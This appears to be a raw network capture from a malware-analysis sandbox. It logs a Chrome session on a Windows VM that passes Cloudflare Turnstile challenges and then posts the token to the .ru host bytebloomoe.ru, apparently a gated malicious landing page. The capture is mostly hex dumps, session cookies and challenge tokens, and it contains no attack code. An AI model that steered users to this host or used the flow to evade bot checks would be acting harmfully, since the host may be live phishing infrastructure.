                            2024-08-13 19:57:42 UTC1369INData Raw: 64 31 72 72 48 79 38 37 4a 38 63 66 4f 7a 38 2f 71 79 64 4c 73 37 64 7a 56 37 64 54 4c 32 38 76 62 34 4e 4b 39 31 2b 54 58 35 74 7a 58 35 51 37 72 37 64 37 4a 34 2b 2f 68 46 76 66 35 35 2b 50 37 43 4f 72 36 37 77 48 75 45 69 49 47 44 79 41 46 43 66 59 64 36 78 34 5a 49 79 63 52 2b 76 49 70 48 79 41 76 4b 77 30 45 4d 51 6e 36 4b 66 67 52 48 55 42 44 4a 55 41 56 4e 69 51 58 47 53 51 32 4b 68 67 59 44 78 73 6a 52 55 51 77 53 30 68 47 46 52 4e 52 45 6c 4d 64 54 42 35 62 46 42 6b 7a 46 79 52 52 48 6c 6f 6c 5a 79 49 74 4a 47 77 75 62 43 31 76 4b 6a 45 76 5a 54 68 78 4e 45 70 39 61 32 74 78 62 46 31 76 55 6f 4e 45 63 31 61 48 53 45 68 6c 59 6f 52 6c 69 6f 56 6c 69 6c 43 48 54 6f 39 75 6a 4a 5a 52 61 6c 70 32 6a 59 2b 62 6d 32 32 52 66 36 47 6d 5a 71 6c 79 65 61
                            Data Ascii: d1rrHy87J8cfOz8/qydLs7dzV7dTL28vb4NK91+TX5tzX5Q7r7d7J4+/hFvf55+P7COr67wHuEiIGDyAFCfYd6x4ZIycR+vIpHyAvKw0EMQn6KfgRHUBDJUAVNiQXGSQ2KhgYDxsjRUQwS0hGFRNRElMdTB5bFBkzFyRRHlolZyItJGwubC1vKjEvZThxNEp9a2txbF1vUoNEc1aHSEhlYoRlioVlilCHTo9ujJZRalp2jY+bm22Rf6GmZqlyea
                            2024-08-13 19:57:42 UTC1369INData Raw: 30 76 44 41 72 76 48 77 31 65 6e 30 31 74 58 38 39 50 6a 4e 38 75 33 5a 34 66 72 58 33 66 44 36 36 77 48 72 44 2f 6a 33 34 73 6b 4f 2f 50 51 47 31 67 48 6b 30 68 62 71 39 42 2f 64 33 66 55 6a 39 69 48 32 4a 68 45 59 46 78 2f 6d 36 42 67 6a 41 43 30 5a 36 4f 37 77 46 69 77 48 37 51 45 72 4a 6a 41 53 4e 54 55 35 44 45 41 43 2b 53 42 48 42 6a 77 37 53 41 6f 6a 48 67 59 50 52 53 63 4b 49 30 30 2f 56 30 4a 4a 4e 31 74 47 57 54 56 66 4e 46 45 2f 47 31 34 7a 50 57 63 6d 4a 6a 35 72 50 32 6b 2f 62 6c 6c 67 58 32 63 76 4d 57 42 72 53 48 56 68 4d 54 63 35 58 6e 52 50 4e 6b 6c 7a 62 6e 6c 64 68 31 79 45 58 6f 47 42 68 56 69 4d 54 6b 4b 44 6b 46 4a 72 64 70 65 53 63 6d 74 55 62 31 5a 39 56 6c 36 56 67 61 47 5a 56 6f 2b 58 68 36 69 41 6e 46 31 36 67 4a 32 45 70 4a 71
                            Data Ascii: 0vDArvHw1en01tX89PjN8u3Z4frX3fD66wHrD/j34skO/PQG1gHk0hbq9B/d3fUj9iH2JhEYFx/m6BgjAC0Z6O7wFiwH7QErJjASNTU5DEAC+SBHBjw7SAojHgYPRScKI00/V0JJN1tGWTVfNFE/G14zPWcmJj5rP2k/bllgX2cvMWBrSHVhMTc5XnRPNklzbnldh1yEXoGBhViMTkKDkFJrdpeScmtUb1Z9Vl6VgaGZVo+Xh6iAnF16gJ2EpJq
                            2024-08-13 19:57:42 UTC1369INData Raw: 2f 71 35 73 64 4f 31 36 4c 58 5a 41 38 47 39 33 4c 7a 77 77 64 6e 41 33 67 33 70 44 38 33 46 35 78 49 4e 44 65 72 4d 41 64 48 73 47 39 72 36 38 78 38 5a 48 66 67 69 44 53 58 37 4a 78 48 64 2f 65 45 56 34 51 49 76 37 53 55 47 4d 79 30 78 43 6a 59 78 38 52 59 37 2b 54 55 52 50 76 30 35 46 30 4d 75 44 78 5a 47 51 69 63 66 53 77 73 62 49 67 55 35 44 69 6c 54 50 55 30 6c 44 6b 45 57 4c 31 73 61 54 54 4e 66 48 6d 45 34 59 6a 64 59 56 78 35 51 4a 6a 56 68 5a 6a 63 2f 62 6d 6c 68 53 6e 4e 74 4d 6b 63 74 59 54 5a 57 65 33 5a 48 55 6e 39 71 53 31 65 44 62 54 70 58 68 6f 4a 6e 59 55 46 32 56 32 4f 4f 5a 46 39 6d 6b 31 4a 4f 62 45 36 42 54 6d 75 61 6c 56 70 79 6e 6f 70 76 63 36 4a 69 57 6f 4a 64 65 32 5a 39 71 6e 2b 68 66 61 2b 71 65 34 6d 79 69 4a 4f 4d 74 6e 65 48
                            Data Ascii: /q5sdO16LXZA8G93LzwwdnA3g3pD83F5xINDerMAdHsG9r68x8ZHfgiDSX7JxHd/eEV4QIv7SUGMy0xCjYx8RY7+TURPv05F0MuDxZGQicfSwsbIgU5DilTPU0lDkEWL1saTTNfHmE4YjdYVx5QJjVhZjc/bmlhSnNtMkctYTZWe3ZHUn9qS1eDbTpXhoJnYUF2V2OOZF9mk1JObE6BTmualVpynopvc6JiWoJde2Z9qn+hfa+qe4myiJOMtneH


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.649748104.18.94.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:43 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:43 UTC379INHTTP/1.1 404 Not Found
                            Date: Tue, 13 Aug 2024 19:57:43 GMT
                            Content-Type: application/json
                            Content-Length: 7
                            Connection: close
                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            cf-chl-out: V6UbANGPjokj1YPGJ0zc98HC3XlPczKnupM=$H5YEnUBjYsnO5VH2
                            Server: cloudflare
                            CF-RAY: 8b2b469aef8ac466-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:43 UTC7INData Raw: 69 6e 76 61 6c 69 64
                            Data Ascii: invalid


                            Session IDSource IPSource PortDestination IPDestination Port
                            25192.168.2.65918440.115.3.253443
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:52 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 77 71 4f 6f 7a 5a 41 2f 30 43 76 35 2b 79 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 61 66 35 36 31 63 63 61 37 65 34 31 63 61 30 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: 7wqOozZA/0Cv5+yt.1Context: 8af561cca7e41ca0
                            2024-08-13 19:57:52 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-08-13 19:57:52 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 37 77 71 4f 6f 7a 5a 41 2f 30 43 76 35 2b 79 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 61 66 35 36 31 63 63 61 37 65 34 31 63 61 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 31 67 2b 44 4d 34 44 4f 4f 42 33 59 71 2f 7a 62 35 46 4c 52 65 64 4e 64 44 6d 68 57 75 61 74 63 43 32 73 30 34 57 75 4e 6f 47 4f 75 73 51 4f 47 65 55 38 53 58 6f 47 31 45 52 74 41 77 4f 76 79 2b 50 66 74 4d 36 65 76 49 52 6e 4f 6b 63 48 47 56 38 38 7a 51 55 36 59 4a 58 6c 50 67 33 6c 46 70 47 6e 44 6d 67 61 77 75 4a 4b 63
                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 7wqOozZA/0Cv5+yt.2Context: 8af561cca7e41ca0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY1g+DM4DOOB3Yq/zb5FLRedNdDmhWuatcC2s04WuNoGOusQOGeU8SXoG1ERtAwOvy+PftM6evIRnOkcHGV88zQU6YJXlPg3lFpGnDmgawuJKc
                            2024-08-13 19:57:52 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 77 71 4f 6f 7a 5a 41 2f 30 43 76 35 2b 79 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 61 66 35 36 31 63 63 61 37 65 34 31 63 61 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 7wqOozZA/0Cv5+yt.3Context: 8af561cca7e41ca0<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                            2024-08-13 19:57:52 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-08-13 19:57:52 UTC58INData Raw: 4d 53 2d 43 56 3a 20 43 2b 75 4b 47 35 6f 70 48 45 65 72 72 5a 7a 4f 6b 71 66 7a 66 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: C+uKG5opHEerrZzOkqfzfA.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.659185104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:58 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            Content-Length: 34321
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Content-type: application/x-www-form-urlencoded
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            CF-Challenge: ca1f4aa5097dc0c
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Origin: https://challenges.cloudflare.com
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:58 UTC16384OUTData Raw: 76 5f 38 62 32 62 34 36 36 61 34 38 63 33 34 34 30 35 3d 4a 71 31 2d 76 6f 69 74 55 4a 75 47 55 65 63 65 6a 69 65 6f 30 7a 24 67 69 63 69 66 24 66 2d 4a 31 24 74 24 67 2d 34 71 53 6f 6a 73 24 4d 6f 24 65 7a 2d 24 6c 24 75 2d 36 68 67 24 51 73 67 31 6b 24 67 53 65 72 76 70 48 53 6f 32 6f 36 2d 69 64 63 33 67 59 6f 61 6b 68 7a 2d 47 73 7a 53 73 6d 67 53 24 6a 79 24 48 75 24 57 72 45 4c 37 2d 24 61 2d 6f 37 70 24 75 6d 66 7a 7a 24 69 6a 2d 69 58 70 24 69 63 69 6f 24 72 75 24 59 78 38 31 24 64 2d 2d 31 24 77 75 24 35 55 70 24 34 4d 6b 69 31 51 57 47 24 55 57 4e 59 78 35 6a 7a 2d 65 4c 6b 4f 76 77 66 2d 24 56 55 55 75 55 5a 2d 34 6b 24 62 31 24 45 79 6d 6f 24 41 64 47 41 25 32 62 41 6b 24 34 38 48 73 7a 34 4a 64 2b 51 4b 35 6d 30 6f 59 2d 59 4b 4d 6d 71 58 2d
                            Data Ascii: v_8b2b466a48c34405=Jq1-voitUJuGUecejieo0z$gicif$f-J1$t$g-4qSojs$Mo$ez-$l$u-6hg$Qsg1k$gServpHSo2o6-idc3gYoakhz-GszSsmgS$jy$Hu$WrEL7-$a-o7p$umfzz$ij-iXp$icio$ru$Yx81$d--1$wu$5Up$4Mki1QWG$UWNYx5jz-eLkOvwf-$VUUuUZ-4k$b1$Eymo$AdGA%2bAk$48Hsz4Jd+QK5m0oY-YKMmqX-
                            2024-08-13 19:57:58 UTC16384OUTData Raw: 43 2d 70 53 6a 54 7a 76 2d 64 2d 56 70 47 53 6f 55 69 44 79 30 7a 24 24 59 4b 72 2d 75 7a 6f 55 57 63 69 7a 24 67 30 65 6e 69 57 2d 6f 6a 48 4e 52 6b 70 24 7a 65 49 39 24 24 30 24 69 58 69 75 24 52 24 48 7a 69 37 24 70 24 69 7a 24 67 24 2b 6f 70 79 48 6c 24 2b 53 65 24 24 50 2d 78 2d 4c 39 69 35 24 78 37 53 71 69 77 24 4e 53 57 71 69 65 70 6f 7a 6f 30 69 45 24 4e 7a 4c 57 55 64 24 48 7a 57 76 69 4a 24 59 7a 24 47 69 76 24 36 24 65 47 24 59 7a 62 31 57 37 69 6c 24 2b 70 57 48 2d 31 71 69 2d 6f 71 6f 69 24 57 2d 31 64 2d 54 24 5a 2d 62 71 65 77 24 55 7a 4a 70 6f 69 24 71 7a 47 70 65 73 24 63 7a 34 70 6f 68 24 32 7a 34 30 65 6b 24 6e 7a 31 67 6f 34 24 6b 7a 72 30 65 48 24 58 7a 34 67 6f 6b 24 43 7a 4a 67 6f 4a 24 68 7a 72 37 6f 43 24 50 7a 34 37 6f 58 24 2d
                            Data Ascii: C-pSjTzv-d-VpGSoUiDy0z$$YKr-uzoUWciz$g0eniW-ojHNRkp$zeI9$$0$iXiu$R$Hzi7$p$iz$g$+opyHl$+Se$$P-x-L9i5$x7Sqiw$NSWqiepozo0iE$NzLWUd$HzWviJ$Yz$Giv$6$eG$Yzb1W7il$+pWH-1qi-oqoi$W-1d-T$Z-bqew$UzJpoi$qzGpes$cz4poh$2z40ek$nz1go4$kzr0eH$Xz4gok$CzJgoJ$hzr7oC$Pz47oX$-
                            2024-08-13 19:57:58 UTC1553OUTData Raw: 48 4e 69 71 73 4b 68 55 45 5a 33 24 34 42 33 71 4f 66 77 48 75 39 50 5a 73 43 55 31 48 6f 6f 63 64 4f 33 74 6d 38 38 75 52 74 52 6c 69 50 24 72 64 4f 4f 38 6e 64 73 66 47 69 50 24 63 68 2d 69 6e 41 54 24 69 67 36 44 78 52 79 58 67 72 53 24 4a 7a 4f 67 72 4e 77 45 79 55 37 4a 68 69 4d 6f 6b 39 70 51 4c 4f 7a 64 75 33 58 6f 58 41 55 7a 4c 53 68 65 45 58 71 31 45 4c 66 45 4f 44 55 30 66 74 24 69 70 70 77 62 76 43 73 37 34 52 44 4d 38 68 24 24 52 24 32 24 4c 24 24 43 78 78 55 47 55 48 4a 72 36 2d 47 2d 74 4e 24 65 6f 44 58 48 2b 55 32 65 64 70 34 36 53 4c 52 30 52 47 62 6f 6c 63 6c 35 4c 6c 61 56 66 63 37 31 44 4b 43 6a 2d 6e 63 4c 78 63 38 43 6f 65 62 65 4a 73 24 50 78 75 66 30 30 66 53 69 38 6e 53 24 24 52 78 74 66 48 2d 33 6a 42 2d 6f 77 30 4f 30 65 6d 41
                            Data Ascii: HNiqsKhUEZ3$4B3qOfwHu9PZsCU1HoocdO3tm88uRtRliP$rdOO8ndsfGiP$ch-inAT$ig6DxRyXgrS$JzOgrNwEyU7JhiMok9pQLOzdu3XoXAUzLSheEXq1ELfEODU0ft$ippwbvCs74RDM8h$$R$2$L$$CxxUGUHJr6-G-tN$eoDXH+U2edp46SLR0RGbolcl5LlaVfc71DKCj-ncLxc8CoebeJs$Pxuf00fSi8nS$$RxtfH-3jB-ow0O0emA
                            2024-08-13 19:57:58 UTC378INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 3336
                            Connection: close
                            cf-chl-out: uDProUIOnDX5nWvjlH5hEY0Vxd4TGVI/2KRpgJ+qgBTwu7CCNSGbjyR+sTJCY3wahrVM/6bJNgmiJebAUHGntMs4abkIS5w4sg2d7FoFUJQp2LUxyz8/LiGXUaUwXcbXSE6PS9guiclRcqCwRp9vPimsoJP4rMZ9PUZAs+xrPO3KKIL/msG6PzkhK4yCB4aaf4aPLibPBwR2broBINJp$sh4B3PDEz0hdQc+t
                            2024-08-13 19:57:58 UTC1091INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 62 72 48 4f 39 6d 51 6a 76 4f 2f 43 55 44 74 76 64 4d 52 7a 4c 72 45 78 62 52 45 44 49 5a 2f 61 36 71 7a 46 6d 52 47 7a 4b 70 4b 7a 78 2f 6f 45 50 64 79 63 6d 73 4b 59 47 66 52 51 69 34 61 72 75 4a 56 63 57 4a 4a 54 56 67 44 65 42 4d 2f 5a 47 70 34 44 54 54 62 37 33 79 69 48 5a 53 42 75 46 4f 7a 37 69 44 77 57 38 66 41 70 72 65 30 6c 32 68 72 6f 53 61 4d 5a 30 38 61 34 44 68 61 43 73 39 37 4e 64 67 63 30 41 6b 7a 74 38 31 62 33 2f 42 6a 2b 69 62 35 30 6d 71 39 36 46 6f 70 7a 78 45 70 6e 42 50 46 56 2b 51 74 6a 75 39 59 58 4e 70 48 7a 72 33 67 4d 68 4e 59 4e 54 6e 4d 61 67 76 76 6a 36 6c 72 42 46 48 74 53 72 6d 61 2b 2f 52 76 70 4a 37 79 58 78 67 55 75 36 57 46 42 74 36 55 30 70 71 4d 2f 74 63 79 58 48 6a 65 43 67
                            Data Ascii: cf-chl-out-s: brHO9mQjvO/CUDtvdMRzLrExbREDIZ/a6qzFmRGzKpKzx/oEPdycmsKYGfRQi4aruJVcWJJTVgDeBM/ZGp4DTTb73yiHZSBuFOz7iDwW8fApre0l2hroSaMZ08a4DhaCs97Ndgc0Akzt81b3/Bj+ib50mq96FopzxEpnBPFV+Qtju9YXNpHzr3gMhNYNTnMagvvj6lrBFHtSrma+/RvpJ7yXxgUu6WFBt6U0pqM/tcyXHjeCg
                            2024-08-13 19:57:58 UTC1269INData Raw: 73 63 54 42 6e 4c 64 35 68 6f 43 4b 79 5a 75 47 6a 4d 71 39 70 61 6d 4e 6b 38 43 68 6f 4e 4b 78 6f 39 75 6f 30 71 33 4c 6b 74 36 69 6d 64 32 79 6e 37 32 79 76 4b 71 6f 71 4e 71 36 34 74 48 70 32 36 76 56 37 64 66 56 36 39 66 62 38 4c 58 47 31 37 6d 79 32 41 4c 72 77 62 77 46 38 4d 62 52 42 65 7a 6e 31 67 49 50 32 38 63 52 36 65 50 6a 46 52 50 6a 36 4e 62 55 36 68 76 63 32 68 6b 41 46 66 4d 68 44 68 33 36 46 68 72 35 34 77 48 71 41 2f 76 38 49 51 54 39 49 7a 51 49 4b 67 49 44 42 50 6b 57 46 51 63 30 2b 50 6f 72 4f 52 49 6d 4e 52 5a 41 51 6a 67 62 43 68 59 73 42 30 45 49 47 79 55 66 51 30 6b 6f 52 55 6c 59 48 46 73 79 4c 54 49 68 55 31 49 6a 56 56 42 57 53 57 55 33 4a 31 38 2f 54 30 4d 36 4a 30 6c 6f 4a 6d 35 44 59 57 52 58 63 56 42 6b 63 7a 35 38 64 44 32
                            Data Ascii: scTBnLd5hoCKyZuGjMq9pamNk8ChoNKxo9uo0q3Lkt6imd2yn72yvKqoqNq64tHp26vV7dfV69fb8LXG17my2ALrwbwF8MbRBezn1gIP28cR6ePjFRPj6NbU6hvc2hkAFfMhDh36Fhr54wHqA/v8IQT9IzQIKgIDBPkWFQc0+PorORImNRZAQjgbChYsB0EIGyUfQ0koRUlYHFsyLTIhU1IjVVBWSWU3J18/T0M6J0loJm5DYWRXcVBkcz58dD2
                            2024-08-13 19:57:58 UTC1369INData Raw: 6d 39 67 53 6d 70 36 51 30 46 54 51 46 67 36 61 48 69 48 56 6e 35 49 65 6b 6d 4d 67 59 36 51 6a 6b 39 2f 69 58 71 59 62 56 6c 30 6c 34 69 59 69 70 4a 67 59 5a 57 6a 65 5a 69 6d 6f 33 35 2b 62 4b 79 59 67 6f 53 71 63 4c 43 75 72 34 65 77 6d 4c 61 51 76 4b 65 33 74 61 69 69 76 59 47 42 77 33 2f 43 77 48 2b 45 73 36 71 6a 78 4b 48 49 77 73 61 39 6e 38 54 4c 70 39 54 5a 79 64 4f 75 71 39 76 41 6d 62 62 61 32 62 62 5a 6f 4e 2b 6c 76 64 6a 6b 74 74 2f 69 78 62 72 66 72 63 50 4b 39 65 6a 48 2b 50 66 78 75 73 72 31 37 64 48 74 36 2f 57 2b 32 76 47 2f 2f 67 58 64 43 4f 77 42 33 76 33 4b 43 51 73 42 30 77 6e 6c 43 74 50 56 35 41 6e 59 35 75 6f 5a 47 78 55 4b 49 65 4c 2b 4a 42 66 36 47 76 55 70 41 65 72 35 4a 52 6b 6d 2f 53 6e 76 37 52 59 76 38 2b 6f 32 4b 76 6b 35
                            Data Ascii: m9gSmp6Q0FTQFg6aHiHVn5IekmMgY6Qjk9/iXqYbVl0l4iYipJgYZWjeZimo35+bKyYgoSqcLCur4ewmLaQvKe3taiivYGBw3/CwH+Es6qjxKHIwsa9n8TLp9TZydOuq9vAmbba2bbZoN+lvdjktt/ixbrfrcPK9ejH+Pfxusr17dHt6/W+2vG//gXdCOwB3v3KCQsB0wnlCtPV5AnY5uoZGxUKIeL+JBf6GvUpAer5JRkm/Snv7RYv8+o2Kvk5
                            2024-08-13 19:57:58 UTC698INData Raw: 31 61 68 6c 32 42 51 45 6d 46 67 56 6c 47 65 47 74 73 55 49 35 39 61 4a 61 53 5a 34 78 53 57 33 65 63 6d 46 47 63 58 6c 52 35 67 35 53 69 6b 71 56 34 71 34 46 37 68 32 79 70 6e 5a 42 70 63 61 32 64 74 62 4e 32 72 58 56 78 72 59 32 35 71 33 6c 37 67 70 72 46 78 4d 43 48 6b 6f 4c 46 78 62 58 49 79 71 50 41 6a 74 4b 52 7a 62 44 56 77 37 4f 6e 6b 38 6a 4e 30 39 33 4b 72 38 44 69 6f 72 2b 30 6f 64 4c 56 77 36 58 58 33 62 33 75 77 2b 48 41 72 2b 44 31 33 76 47 74 35 63 61 34 36 50 58 6e 74 75 6e 57 76 66 37 75 33 72 34 49 42 4f 63 4c 43 2f 62 58 79 73 58 4e 34 38 76 50 36 65 4d 52 7a 51 54 53 39 39 6f 59 42 75 37 64 43 74 6e 5a 49 68 41 53 4a 53 58 6d 33 75 63 6c 34 51 4d 76 37 51 59 41 49 2b 37 79 44 41 72 74 4d 69 34 33 50 41 38 71 2f 50 30 58 48 2f 33 30 47
                            Data Ascii: 1ahl2BQEmFgVlGeGtsUI59aJaSZ4xSW3ecmFGcXlR5g5SikqV4q4F7h2ypnZBpca2dtbN2rXVxrY25q3l7gprFxMCHkoLFxbXIyqPAjtKRzbDVw7Onk8jN093Kr8Dior+0odLVw6XX3b3uw+HAr+D13vGt5ca46PXntunWvf7u3r4IBOcLC/bXysXN48vP6eMRzQTS99oYBu7dCtnZIhASJSXm3ucl4QMv7QYAI+7yDArtMi43PA8q/P0XH/30G


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.659187104.21.81.2074432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:59 UTC885OUTPOST /8QnWX/ HTTP/1.1
                            Host: bytebloomoe.ru
                            Connection: keep-alive
                            Content-Length: 539
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: https://bytebloomoe.ru
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Referer: https://bytebloomoe.ru/8QnWX/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            Cookie: PHPSESSID=kn523ugumdhe6h89qej7h3np25
                            2024-08-13 19:57:59 UTC539OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 6a 74 69 71 6c 51 37 4f 56 64 57 6c 58 66 69 6a 51 72 44 63 4a 72 71 41 39 6f 7a 54 58 67 70 30 36 76 6b 47 47 4d 7a 61 37 78 45 69 45 77 58 53 4f 52 51 36 46 79 4e 52 75 6e 48 4b 55 62 36 54 45 30 52 78 5f 79 36 78 4b 2d 69 51 7a 61 4b 55 30 65 6f 48 46 4f 57 6d 4f 6e 49 67 73 46 48 53 68 57 63 34 44 2d 37 6c 52 52 62 77 6b 33 71 68 72 77 65 45 6b 36 32 31 4f 6c 52 51 68 6c 6a 45 55 66 76 72 33 55 5a 39 58 50 68 4b 35 6b 6f 63 34 71 46 65 53 6d 4a 6e 6a 74 54 63 32 65 4e 55 43 53 41 4d 6a 79 57 6d 65 64 6f 69 39 61 4f 42 74 77 39 39 69 6c 6c 4f 41 4e 63 71 67 49 5f 61 6c 51 50 53 78 57 50 37 6b 53 50 41 67 70 6d 65 47 69 4a 52 78 4d 50 67 6c 34 6a 79 58 76 63 77 6f 4f 43 4c 54 45 54
                            Data Ascii: cf-turnstile-response=0.jtiqlQ7OVdWlXfijQrDcJrqA9ozTXgp06vkGGMza7xEiEwXSORQ6FyNRunHKUb6TE0Rx_y6xK-iQzaKU0eoHFOWmOnIgsFHShWc4D-7lRRbwk3qhrweEk621OlRQhljEUfvr3UZ9XPhK5koc4qFeSmJnjtTc2eNUCSAMjyWmedoi9aOBtw99illOANcqgI_alQPSxWP7kSPAgpmeGiJRxMPgl4jyXvcwoOCLTET
                            2024-08-13 19:58:01 UTC771INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:58:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-powered-by: PHP/7.3.33
                            access-control-allow-origin: *
                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                            cache-control: no-store, no-cache, must-revalidate
                            pragma: no-cache
                            vary: Accept-Encoding
                            CF-Cache-Status: DYNAMIC
